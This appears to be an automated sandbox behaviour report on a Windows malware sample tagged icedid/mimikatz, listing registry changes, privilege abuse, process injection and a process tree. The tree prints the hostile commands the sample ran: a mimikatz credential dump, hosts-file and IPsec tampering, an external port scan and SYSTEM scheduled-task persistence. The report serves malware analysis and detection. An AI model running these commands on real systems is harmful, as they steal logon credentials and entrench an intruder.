Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bmgkttu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tqbingtiu.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	abkbubrfy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	umueiy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4436	cmd.exe
4084	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x0009000000023444-6.dat	nsis_installer_2
behavioral2/files/0x0008000000023459-14.dat	nsis_installer_1
behavioral2/files/0x0008000000023459-14.dat	nsis_installer_2

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	bmgkttu.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	bmgkttu.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	bmgkttu.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	bmgkttu.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	bmgkttu.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	bmgkttu.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cuinytuyr.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cuinytuyr.exe

Modifies registry class 14 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	bmgkttu.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	bmgkttu.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	bmgkttu.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4084	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4388	schtasks.exe
2456	schtasks.exe
4148	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
2736	2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	4860	bmgkttu.exe
Token: SeDebugPrivilege	1696	bmgkttu.exe
Token: SeDebugPrivilege	3288	vfshost.exe
Token: SeDebugPrivilege	5032	cuinytuyr.exe
Token: SeLockMemoryPrivilege	2388	uyibml.exe
Token: SeLockMemoryPrivilege	2388	uyibml.exe
Token: SeDebugPrivilege	2736	cuinytuyr.exe
Token: SeDebugPrivilege	3320	cuinytuyr.exe
Token: SeDebugPrivilege	2232	cuinytuyr.exe
Token: SeDebugPrivilege	208	cuinytuyr.exe
Token: SeDebugPrivilege	4216	cuinytuyr.exe
Token: SeDebugPrivilege	1964	cuinytuyr.exe
Token: SeDebugPrivilege	784	cuinytuyr.exe
Token: SeDebugPrivilege	4444	cuinytuyr.exe
Token: SeDebugPrivilege	2092	cuinytuyr.exe
Token: SeDebugPrivilege	2052	cuinytuyr.exe
Token: SeDebugPrivilege	2536	cuinytuyr.exe
Token: SeDebugPrivilege	4652	cuinytuyr.exe
Token: SeDebugPrivilege	3700	cuinytuyr.exe
Token: SeDebugPrivilege	3556	cuinytuyr.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2736	2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe
2736	2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe
4860	bmgkttu.exe
4860	bmgkttu.exe
1696	bmgkttu.exe
1696	bmgkttu.exe
3680	xohudmc.exe
1360	umueiy.exe
924	bmgkttu.exe
924	bmgkttu.exe
2852	bmgkttu.exe
2852	bmgkttu.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 4436	2736	2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe	84
PID 2736 wrote to memory of 4436	2736	2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe	84
PID 2736 wrote to memory of 4436	2736	2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe	84
PID 4436 wrote to memory of 4084	4436	cmd.exe	87
PID 4436 wrote to memory of 4084	4436	cmd.exe	87
PID 4436 wrote to memory of 4084	4436	cmd.exe	87
PID 4436 wrote to memory of 4860	4436	cmd.exe	93
PID 4436 wrote to memory of 4860	4436	cmd.exe	93
PID 4436 wrote to memory of 4860	4436	cmd.exe	93
PID 1696 wrote to memory of 3620	1696	bmgkttu.exe	95
PID 1696 wrote to memory of 3620	1696	bmgkttu.exe	95
PID 1696 wrote to memory of 3620	1696	bmgkttu.exe	95
PID 3620 wrote to memory of 3204	3620	cmd.exe	97
PID 3620 wrote to memory of 3204	3620	cmd.exe	97
PID 3620 wrote to memory of 3204	3620	cmd.exe	97
PID 3620 wrote to memory of 1424	3620	cmd.exe	98
PID 3620 wrote to memory of 1424	3620	cmd.exe	98
PID 3620 wrote to memory of 1424	3620	cmd.exe	98
PID 3620 wrote to memory of 2920	3620	cmd.exe	99
PID 3620 wrote to memory of 2920	3620	cmd.exe	99
PID 3620 wrote to memory of 2920	3620	cmd.exe	99
PID 3620 wrote to memory of 388	3620	cmd.exe	100
PID 3620 wrote to memory of 388	3620	cmd.exe	100
PID 3620 wrote to memory of 388	3620	cmd.exe	100
PID 3620 wrote to memory of 456	3620	cmd.exe	101
PID 3620 wrote to memory of 456	3620	cmd.exe	101
PID 3620 wrote to memory of 456	3620	cmd.exe	101
PID 3620 wrote to memory of 4444	3620	cmd.exe	102
PID 3620 wrote to memory of 4444	3620	cmd.exe	102
PID 3620 wrote to memory of 4444	3620	cmd.exe	102
PID 1696 wrote to memory of 4316	1696	bmgkttu.exe	106
PID 1696 wrote to memory of 4316	1696	bmgkttu.exe	106
PID 1696 wrote to memory of 4316	1696	bmgkttu.exe	106
PID 1696 wrote to memory of 3768	1696	bmgkttu.exe	108
PID 1696 wrote to memory of 3768	1696	bmgkttu.exe	108
PID 1696 wrote to memory of 3768	1696	bmgkttu.exe	108
PID 1696 wrote to memory of 1340	1696	bmgkttu.exe	110
PID 1696 wrote to memory of 1340	1696	bmgkttu.exe	110
PID 1696 wrote to memory of 1340	1696	bmgkttu.exe	110
PID 1696 wrote to memory of 412	1696	bmgkttu.exe	114
PID 1696 wrote to memory of 412	1696	bmgkttu.exe	114
PID 1696 wrote to memory of 412	1696	bmgkttu.exe	114
PID 412 wrote to memory of 860	412	cmd.exe	116
PID 412 wrote to memory of 860	412	cmd.exe	116
PID 412 wrote to memory of 860	412	cmd.exe	116
PID 4004 wrote to memory of 4324	4004	net.exe	119
PID 4004 wrote to memory of 4324	4004	net.exe	119
PID 4004 wrote to memory of 4324	4004	net.exe	119
PID 5000 wrote to memory of 1576	5000	net.exe	122
PID 5000 wrote to memory of 1576	5000	net.exe	122
PID 5000 wrote to memory of 1576	5000	net.exe	122
PID 3904 wrote to memory of 4300	3904	net.exe	125
PID 3904 wrote to memory of 4300	3904	net.exe	125
PID 3904 wrote to memory of 4300	3904	net.exe	125
PID 1728 wrote to memory of 2148	1728	net.exe	128
PID 1728 wrote to memory of 2148	1728	net.exe	128
PID 1728 wrote to memory of 2148	1728	net.exe	128
PID 1696 wrote to memory of 2524	1696	bmgkttu.exe	129
PID 1696 wrote to memory of 2524	1696	bmgkttu.exe	129
PID 1696 wrote to memory of 2524	1696	bmgkttu.exe	129
PID 2524 wrote to memory of 1440	2524	cmd.exe	131
PID 2524 wrote to memory of 1440	2524	cmd.exe	131
PID 2524 wrote to memory of 1440	2524	cmd.exe	131
PID 1440 wrote to memory of 3468	1440	net.exe	132

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1600
- C:\Windows\TEMP\ipcijinrc\uyibml.exe
  "C:\Windows\TEMP\ipcijinrc\uyibml.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2388

C:\Users\Admin\AppData\Local\Temp\2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2024-09-11_391da25440ef5baab4005f9f2adaee4d_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\kunylkua\bmgkttu.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:4436
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4084
- - C:\Windows\kunylkua\bmgkttu.exe
    C:\Windows\kunylkua\bmgkttu.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:4860

C:\Windows\kunylkua\bmgkttu.exe
C:\Windows\kunylkua\bmgkttu.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3204
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1424
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2920
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    PID:388
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:456
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:4444
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:4316
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3768
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1340
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\lntufbicv\nibkahlsb\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:412
- - C:\Windows\lntufbicv\nibkahlsb\wpcap.exe
    C:\Windows\lntufbicv\nibkahlsb\wpcap.exe /S
    3⤵
    - Executes dropped EXE
    PID:860
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4004
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4324
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:5000
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        
        PID:1576
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3904
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4300
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1728
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2148
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2524
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1440
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:3468
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4412
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1964
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:3684
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\lntufbicv\nibkahlsb\tqbingtiu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\lntufbicv\nibkahlsb\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3756
- - C:\Windows\lntufbicv\nibkahlsb\tqbingtiu.exe
    C:\Windows\lntufbicv\nibkahlsb\tqbingtiu.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\lntufbicv\nibkahlsb\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4084
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\lntufbicv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\lntufbicv\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:3796
- - C:\Windows\lntufbicv\Corporate\vfshost.exe
    C:\Windows\lntufbicv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3288
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yungtilsu" /ru system /tr "cmd /c C:\Windows\ime\bmgkttu.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4556
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3536
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "yungtilsu" /ru system /tr "cmd /c C:\Windows\ime\bmgkttu.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:4388
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mgrgkckyl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kunylkua\bmgkttu.exe /p everyone:F"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:4056
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "mgrgkckyl" /ru system /tr "cmd /c echo Y|cacls C:\Windows\kunylkua\bmgkttu.exe /p everyone:F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2456
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bmpsinsgu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ipcijinrc\uyibml.exe /p everyone:F"
  2⤵
  PID:4588
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3604
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 1 /tn "bmpsinsgu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\ipcijinrc\uyibml.exe /p everyone:F"
    3⤵
